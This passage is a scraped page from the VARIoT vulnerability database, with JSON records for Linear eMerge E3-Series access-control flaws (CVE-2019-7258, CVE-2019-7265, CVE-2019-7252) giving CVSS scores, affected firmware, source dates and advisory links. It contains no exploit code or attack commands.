            "url": "https://www.nortekcontrol.com/pdf/literature/emerge-e3-series-brochure.pdf"
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-005910"
          }
        ]
      },
      "problemtype_data": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "problemtype": "CWE-863",
            "trust": 1.1
          },
          {
            "problemtype": "Authorization / authority / access control (CWE-264) [NVD evaluation ]",
            "trust": 0.8
          },
          {
            "problemtype": "CWE-264",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-158693"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-005910"
          },
          {
            "db": "NVD",
            "id": "CVE-2019-7258"
          }
        ]
      },
      "references": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/references#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "trust": 2.5,
            "url": "https://www.applied-risk.com/resources/ar-2019-005"
          },
          {
            "trust": 2.0,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2019-7258"
          },
          {
            "trust": 1.7,
            "url": "http://packetstormsecurity.com/files/155260/linear-emerge-e3-1.00-06-privilege-escalation.html"
          },
          {
            "trust": 1.7,
            "url": "https://applied-risk.com/labs/advisories"
          },
          {
            "trust": 0.8,
            "url": "https://jvn.jp/vu/jvnvu96911165/"
          },
          {
            "trust": 0.8,
            "url": "https://www.cisa.gov/news-events/ics-advisories/icsa-24-065-01"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2019-34628"
          },
          {
            "db": "VULHUB",
            "id": "VHN-158693"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-005910"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201907-105"
          },
          {
            "db": "NVD",
            "id": "CVE-2019-7258"
          }
        ]
      },
      "sources": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "db": "CNVD",
            "id": "CNVD-2019-34628"
          },
          {
            "db": "VULHUB",
            "id": "VHN-158693"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-005910"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201907-105"
          },
          {
            "db": "NVD",
            "id": "CVE-2019-7258"
          }
        ]
      },
      "sources_release_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2019-10-10T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2019-34628"
          },
          {
            "date": "2019-07-02T00:00:00",
            "db": "VULHUB",
            "id": "VHN-158693"
          },
          {
            "date": "2019-07-04T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2019-005910"
          },
          {
            "date": "2019-07-02T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201907-105"
          },
          {
            "date": "2019-07-02T19:15:11.290000",
            "db": "NVD",
            "id": "CVE-2019-7258"
          }
        ]
      },
      "sources_update_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2019-10-11T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2019-34628"
          },
          {
            "date": "2020-08-24T00:00:00",
            "db": "VULHUB",
            "id": "VHN-158693"
          },
          {
            "date": "2024-03-07T08:15:00",
            "db": "JVNDB",
            "id": "JVNDB-2019-005910"
          },
          {
            "date": "2020-08-25T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201907-105"
          },
          {
            "date": "2022-10-14T01:33:11.630000",
            "db": "NVD",
            "id": "CVE-2019-7258"
          }
        ]
      },
      "threat_type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "remote",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201907-105"
          }
        ],
        "trust": 0.6
      },
      "title": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/title#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Linear\u00a0eMerge\u00a0E3\u00a0 Vulnerabilities related to authorization, privileges, and access control in series devices",
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-005910"
          }
        ],
        "trust": 0.8
      },
      "type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "permissions and access control issues",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201907-105"
          }
        ],
        "trust": 0.6
      }
    }

    VAR-201907-0166

    Vulnerability from variot - Updated: 2024-03-18 22:23

    Linear eMerge E3-Series devices allow Remote Code Execution (root access over SSH). Linear eMerge E3 series devices contain a vulnerability related to the use of hardcoded credentials.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state.

    Nortek Security & Control Linear eMerge E3-Series has a trust management issue vulnerability. An attacker could exploit this vulnerability to execute code

    Show details on source website

    {
      "@context": {
        "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
        "affected_products": {
          "@id": "https://www.variotdbs.pl/ref/affected_products"
        },
        "configurations": {
          "@id": "https://www.variotdbs.pl/ref/configurations"
        },
        "credits": {
          "@id": "https://www.variotdbs.pl/ref/credits"
        },
        "cvss": {
          "@id": "https://www.variotdbs.pl/ref/cvss/"
        },
        "description": {
          "@id": "https://www.variotdbs.pl/ref/description/"
        },
        "exploit_availability": {
          "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
        },
        "external_ids": {
          "@id": "https://www.variotdbs.pl/ref/external_ids/"
        },
        "iot": {
          "@id": "https://www.variotdbs.pl/ref/iot/"
        },
        "iot_taxonomy": {
          "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
        },
        "patch": {
          "@id": "https://www.variotdbs.pl/ref/patch/"
        },
        "problemtype_data": {
          "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
        },
        "references": {
          "@id": "https://www.variotdbs.pl/ref/references/"
        },
        "sources": {
          "@id": "https://www.variotdbs.pl/ref/sources/"
        },
        "sources_release_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
        },
        "sources_update_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
        },
        "threat_type": {
          "@id": "https://www.variotdbs.pl/ref/threat_type/"
        },
        "title": {
          "@id": "https://www.variotdbs.pl/ref/title/"
        },
        "type": {
          "@id": "https://www.variotdbs.pl/ref/type/"
        }
      },
      "@id": "https://www.variotdbs.pl/vuln/VAR-201907-0166",
      "affected_products": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "model": "linear emerge elite",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "nortekcontrol",
            "version": "1.00-06"
          },
          {
            "model": "linear emerge essential",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "nortekcontrol",
            "version": "1.00-06"
          },
          {
            "model": "linear emerge elite",
            "scope": null,
            "trust": 0.8,
            "vendor": "nortek",
            "version": null
          },
          {
            "model": "linear emerge essential",
            "scope": null,
            "trust": 0.8,
            "vendor": "nortek",
            "version": null
          },
          {
            "model": "security\u0026control linear emerge e3-series",
            "scope": "lte",
            "trust": 0.6,
            "vendor": "nortek",
            "version": "\u003c=1.00-06"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2019-34629"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-005913"
          },
          {
            "db": "NVD",
            "id": "CVE-2019-7265"
          }
        ]
      },
      "configurations": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/configurations#",
          "children": {
            "@container": "@list"
          },
          "cpe_match": {
            "@container": "@list"
          },
          "data": {
            "@container": "@list"
          },
          "nodes": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "CVE_data_version": "4.0",
            "nodes": [
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:nortekcontrol:linear_emerge_essential_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "1.00-06",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:nortekcontrol:linear_emerge_essential:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:nortekcontrol:linear_emerge_elite_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "1.00-06",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:nortekcontrol:linear_emerge_elite:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2019-7265"
          }
        ]
      },
      "credits": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/credits#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "LiquidWorm",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201907-100"
          }
        ],
        "trust": 0.6
      },
      "cve": "CVE-2019-7265",
      "cvss": {
        "@context": {
          "cvssV2": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
          },
          "cvssV3": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
          },
          "severity": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/cvss/severity#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "cvssV2": [
              {
                "acInsufInfo": false,
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "NVD",
                "availabilityImpact": "COMPLETE",
                "baseScore": 10.0,
                "confidentialityImpact": "COMPLETE",
                "exploitabilityScore": 10.0,
                "impactScore": 10.0,
                "integrityImpact": "COMPLETE",
                "obtainAllPrivilege": false,
                "obtainOtherPrivilege": false,
                "obtainUserPrivilege": false,
                "severity": "HIGH",
                "trust": 1.0,
                "userInteractionRequired": false,
                "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
                "version": "2.0"
              },
              {
                "acInsufInfo": null,
                "accessComplexity": "Low",
                "accessVector": "Network",
                "authentication": "None",
                "author": "NVD",
                "availabilityImpact": "Complete",
                "baseScore": 10.0,
                "confidentialityImpact": "Complete",
                "exploitabilityScore": null,
                "id": "CVE-2019-7265",
                "impactScore": null,
                "integrityImpact": "Complete",
                "obtainAllPrivilege": null,
                "obtainOtherPrivilege": null,
                "obtainUserPrivilege": null,
                "severity": "High",
                "trust": 0.8,
                "userInteractionRequired": null,
                "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
                "version": "2.0"
              },
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "CNVD",
                "availabilityImpact": "COMPLETE",
                "baseScore": 10.0,
                "confidentialityImpact": "COMPLETE",
                "exploitabilityScore": 10.0,
                "id": "CNVD-2019-34629",
                "impactScore": 10.0,
                "integrityImpact": "COMPLETE",
                "severity": "HIGH",
                "trust": 0.6,
                "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
                "version": "2.0"
              },
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "VULHUB",
                "availabilityImpact": "COMPLETE",
                "baseScore": 10.0,
                "confidentialityImpact": "COMPLETE",
                "exploitabilityScore": 10.0,
                "id": "VHN-158700",
                "impactScore": 10.0,
                "integrityImpact": "COMPLETE",
                "severity": "HIGH",
                "trust": 0.1,
                "vectorString": "AV:N/AC:L/AU:N/C:C/I:C/A:C",
                "version": "2.0"
              }
            ],
            "cvssV3": [
              {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "author": "NVD",
                "availabilityImpact": "HIGH",
                "baseScore": 9.8,
                "baseSeverity": "CRITICAL",
                "confidentialityImpact": "HIGH",
                "exploitabilityScore": 3.9,
                "impactScore": 5.9,
                "integrityImpact": "HIGH",
                "privilegesRequired": "NONE",
                "scope": "UNCHANGED",
                "trust": 1.0,
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
                "version": "3.1"
              },
              {
                "attackComplexity": "Low",
                "attackVector": "Network",
                "author": "NVD",
                "availabilityImpact": "High",
                "baseScore": 9.8,
                "baseSeverity": "Critical",
                "confidentialityImpact": "High",
                "exploitabilityScore": null,
                "id": "CVE-2019-7265",
                "impactScore": null,
                "integrityImpact": "High",
                "privilegesRequired": "None",
                "scope": "Unchanged",
                "trust": 0.8,
                "userInteraction": "None",
                "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
                "version": "3.0"
              }
            ],
            "severity": [
              {
                "author": "NVD",
                "id": "CVE-2019-7265",
                "trust": 1.8,
                "value": "CRITICAL"
              },
              {
                "author": "CNVD",
                "id": "CNVD-2019-34629",
                "trust": 0.6,
                "value": "HIGH"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-201907-100",
                "trust": 0.6,
                "value": "CRITICAL"
              },
              {
                "author": "VULHUB",
                "id": "VHN-158700",
                "trust": 0.1,
                "value": "HIGH"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2019-34629"
          },
          {
            "db": "VULHUB",
            "id": "VHN-158700"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-005913"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201907-100"
          },
          {
            "db": "NVD",
            "id": "CVE-2019-7265"
          }
        ]
      },
      "description": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/description#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Linear eMerge E3-Series devices allow Remote Code Execution (root access over SSH). Linear eMerge E3 series devices contain a vulnerability related to the use of hardcoded credentials.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state. \n\nNortek Security \u0026 Control Linear eMerge E3-Series has a trust management issue vulnerability. An attacker could exploit this vulnerability to execute code",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2019-7265"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-005913"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2019-34629"
          },
          {
            "db": "VULHUB",
            "id": "VHN-158700"
          }
        ],
        "trust": 2.25
      },
      "external_ids": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "db": "NVD",
            "id": "CVE-2019-7265",
            "trust": 3.9
          },
          {
            "db": "PACKETSTORM",
            "id": "155267",
            "trust": 1.7
          },
          {
            "db": "ICS CERT",
            "id": "ICSA-24-065-01",
            "trust": 0.8
          },
          {
            "db": "JVN",
            "id": "JVNVU96911165",
            "trust": 0.8
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-005913",
            "trust": 0.8
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201907-100",
            "trust": 0.7
          },
          {
            "db": "CNVD",
            "id": "CNVD-2019-34629",
            "trust": 0.6
          },
          {
            "db": "EXPLOIT-DB",
            "id": "47625",
            "trust": 0.6
          },
          {
            "db": "VULHUB",
            "id": "VHN-158700",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2019-34629"
          },
          {
            "db": "VULHUB",
            "id": "VHN-158700"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-005913"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201907-100"
          },
          {
            "db": "NVD",
            "id": "CVE-2019-7265"
          }
        ]
      },
      "id": "VAR-201907-0166",
      "iot": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": true,
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2019-34629"
          },
          {
            "db": "VULHUB",
            "id": "VHN-158700"
          }
        ],
        "trust": 1.7
      },
      "iot_taxonomy": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "category": [
              "IoT"
            ],
            "sub_category": null,
            "trust": 0.6
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2019-34629"
          }
        ]
      },
      "last_update_date": "2024-03-18T22:23:59.246000Z",
      "patch": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/patch#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "title": "eMerge\u00a0E3-Series\u00a0Access\u00a0Control",
            "trust": 0.8,
            "url": "https://www.nortekcontrol.com/pdf/literature/emerge-e3-series-brochure.pdf"
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-005913"
          }
        ]
      },
      "problemtype_data": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "problemtype": "CWE-798",
            "trust": 1.1
          },
          {
            "problemtype": "Use hard-coded credentials (CWE-798) [NVD evaluation ]",
            "trust": 0.8
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-158700"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-005913"
          },
          {
            "db": "NVD",
            "id": "CVE-2019-7265"
          }
        ]
      },
      "references": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/references#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "trust": 2.5,
            "url": "https://www.applied-risk.com/resources/ar-2019-005"
          },
          {
            "trust": 2.0,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2019-7265"
          },
          {
            "trust": 1.7,
            "url": "http://packetstormsecurity.com/files/155267/nortek-linear-emerge-e3-access-controller-1.00-06-ssh-ftp-remote-root.html"
          },
          {
            "trust": 1.7,
            "url": "https://applied-risk.com/labs/advisories"
          },
          {
            "trust": 0.8,
            "url": "https://jvn.jp/vu/jvnvu96911165/"
          },
          {
            "trust": 0.8,
            "url": "https://www.cisa.gov/news-events/ics-advisories/icsa-24-065-01"
          },
          {
            "trust": 0.6,
            "url": "https://www.exploit-db.com/exploits/47625"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2019-34629"
          },
          {
            "db": "VULHUB",
            "id": "VHN-158700"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-005913"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201907-100"
          },
          {
            "db": "NVD",
            "id": "CVE-2019-7265"
          }
        ]
      },
      "sources": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "db": "CNVD",
            "id": "CNVD-2019-34629"
          },
          {
            "db": "VULHUB",
            "id": "VHN-158700"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-005913"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201907-100"
          },
          {
            "db": "NVD",
            "id": "CVE-2019-7265"
          }
        ]
      },
      "sources_release_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2019-10-10T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2019-34629"
          },
          {
            "date": "2019-07-02T00:00:00",
            "db": "VULHUB",
            "id": "VHN-158700"
          },
          {
            "date": "2019-07-04T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2019-005913"
          },
          {
            "date": "2019-07-02T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201907-100"
          },
          {
            "date": "2019-07-02T17:15:12.070000",
            "db": "NVD",
            "id": "CVE-2019-7265"
          }
        ]
      },
      "sources_update_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2019-10-11T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2019-34629"
          },
          {
            "date": "2019-11-12T00:00:00",
            "db": "VULHUB",
            "id": "VHN-158700"
          },
          {
            "date": "2024-03-07T08:27:00",
            "db": "JVNDB",
            "id": "JVNDB-2019-005913"
          },
          {
            "date": "2019-11-13T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201907-100"
          },
          {
            "date": "2022-10-13T19:41:17.993000",
            "db": "NVD",
            "id": "CVE-2019-7265"
          }
        ]
      },
      "threat_type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "remote",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201907-100"
          }
        ],
        "trust": 0.6
      },
      "title": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/title#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Linear\u00a0eMerge\u00a0E3\u00a0 Vulnerabilities related to the use of hard-coded credentials in series devices",
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-005913"
          }
        ],
        "trust": 0.8
      },
      "type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "trust management problem",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201907-100"
          }
        ],
        "trust": 0.6
      }
    }

    VAR-201907-0152

    Vulnerability from variot - Updated: 2023-12-18 13:52

    Linear eMerge E3-Series devices have Default Credentials. Linear eMerge E3 Series devices contain vulnerabilities related to certificate and password management.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. Nortek Security & Control Linear eMerge E3-Series is an access control device from Nortek Security & Control, USA.

    Nortek Security & Control Linear eMerge E3-Series has a trust management issue vulnerability. An attacker could use this vulnerability to obtain default passwords and identify target systems connected to the network. to attack affected components

    Show details on source website

    {
      "@context": {
        "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
        "affected_products": {
          "@id": "https://www.variotdbs.pl/ref/affected_products"
        },
        "configurations": {
          "@id": "https://www.variotdbs.pl/ref/configurations"
        },
        "credits": {
          "@id": "https://www.variotdbs.pl/ref/credits"
        },
        "cvss": {
          "@id": "https://www.variotdbs.pl/ref/cvss/"
        },
        "description": {
          "@id": "https://www.variotdbs.pl/ref/description/"
        },
        "exploit_availability": {
          "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
        },
        "external_ids": {
          "@id": "https://www.variotdbs.pl/ref/external_ids/"
        },
        "iot": {
          "@id": "https://www.variotdbs.pl/ref/iot/"
        },
        "iot_taxonomy": {
          "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
        },
        "patch": {
          "@id": "https://www.variotdbs.pl/ref/patch/"
        },
        "problemtype_data": {
          "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
        },
        "references": {
          "@id": "https://www.variotdbs.pl/ref/references/"
        },
        "sources": {
          "@id": "https://www.variotdbs.pl/ref/sources/"
        },
        "sources_release_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
        },
        "sources_update_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
        },
        "threat_type": {
          "@id": "https://www.variotdbs.pl/ref/threat_type/"
        },
        "title": {
          "@id": "https://www.variotdbs.pl/ref/title/"
        },
        "type": {
          "@id": "https://www.variotdbs.pl/ref/type/"
        }
      },
      "@id": "https://www.variotdbs.pl/vuln/VAR-201907-0152",
      "affected_products": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "model": "linear emerge elite",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "nortekcontrol",
            "version": "1.00-06"
          },
          {
            "model": "linear emerge essential",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "nortekcontrol",
            "version": "1.00-06"
          },
          {
            "model": "linear emerge elite",
            "scope": null,
            "trust": 0.8,
            "vendor": "nortek",
            "version": null
          },
          {
            "model": "linear emerge essential",
            "scope": null,
            "trust": 0.8,
            "vendor": "nortek",
            "version": null
          },
          {
            "model": "security\u0026control linear emerge e3-series",
            "scope": "lte",
            "trust": 0.6,
            "vendor": "nortek",
            "version": "\u003c=1.00-06"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2019-34626"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-005906"
          },
          {
            "db": "NVD",
            "id": "CVE-2019-7252"
          }
        ]
      },
      "configurations": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/configurations#",
          "children": {
            "@container": "@list"
          },
          "cpe_match": {
            "@container": "@list"
          },
          "data": {
            "@container": "@list"
          },
          "nodes": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "CVE_data_version": "4.0",
            "nodes": [
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:nortekcontrol:linear_emerge_essential_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "1.00-06",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:nortekcontrol:linear_emerge_essential:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:nortekcontrol:linear_emerge_elite_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "1.00-06",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:nortekcontrol:linear_emerge_elite:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2019-7252"
          }
        ]
      },
      "cve": "CVE-2019-7252",
      "cvss": {
        "@context": {
          "cvssV2": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
          },
          "cvssV3": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
          },
          "severity": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/cvss/severity#"
            },
